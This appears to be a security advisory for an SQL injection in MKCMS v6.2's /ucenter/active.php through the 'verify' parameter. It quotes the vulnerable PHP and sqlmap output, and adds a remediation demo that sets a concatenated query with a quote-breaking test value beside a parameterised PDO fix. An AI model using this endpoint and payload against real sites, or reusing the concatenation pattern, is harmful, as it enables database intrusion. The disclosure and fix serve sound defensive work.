    817 B / 2021-07-15 19:56:49
        MKCMS v6.2 /ucenter/active.php front-end SQL injection vulnerability
    ====================================================================
    
    1. Vulnerability overview
    -------------------------
    
    2. Affected versions
    --------------------
    
    MKCMS v6.2
    
    3. Reproduction
    ---------------
    
    `/ucenter/active.php?verify=1` is injectable through the `verify` parameter:
    
        /ucenter/active.php
        <?php
        ...
        $verify = stripslashes(trim($_GET['verify']));  // strips the backslashes used for escaping
        $nowtime = time();
        $query = mysql_query("select u_id from mkcms_user where u_question='$verify'");
        $row = mysql_fetch_array($query);
        ...
    
    Running sqlmap against the parameter is enough:
    
        [INFO] GET parameter 'verify' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
        [INFO] GET parameter 'verify' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
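
The fix for the pattern shown above is to bind `verify` as a query parameter instead of concatenating it into the SQL string. The following PHP is an added example, not MKCMS code: it assumes PDO with the SQLite driver, and the in-memory table, its rows and the function names are constructed for illustration.

```php
<?php
// Added example, not MKCMS code. An in-memory SQLite table stands in for
// mkcms_user so the script runs offline; the rows below are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE mkcms_user (u_id INTEGER PRIMARY KEY, u_question TEXT)");
$pdo->exec("INSERT INTO mkcms_user (u_id, u_question)
            VALUES (1, 'tok-alice'), (2, 'tok-bob')");

// Same pattern as active.php: the request value becomes part of the SQL text,
// so a quote in the value changes the structure of the query.
function find_user_concat(PDO $pdo, string $verify): array
{
    $sql = "select u_id from mkcms_user where u_question='$verify'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the SQL text is fixed and the value is bound as a parameter,
// so it is only ever compared against u_question as data.
function find_user_bound(PDO $pdo, string $verify): array
{
    $stmt = $pdo->prepare('SELECT u_id FROM mkcms_user WHERE u_question = :verify');
    $stmt->execute([':verify' => $verify]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$inputs = [
    'tok-alice',       // legitimate token (constructed)
    "x' OR '1'='1",    // textbook quote-breaking test value (constructed)
];

foreach ($inputs as $verify) {
    printf(
        "%-14s concat=%s bound=%s\n",
        $verify,
        json_encode(find_user_concat($pdo, $verify)),
        json_encode(find_user_bound($pdo, $verify))
    );
}
```

For the legitimate token both functions return the same row; for the second input the concatenated query matches every row while the bound query matches none. With the MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the statement is prepared on the server.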
    
    References
    ----------
    
    > https://xz.aliyun.com/t/7580#toc-4
    
    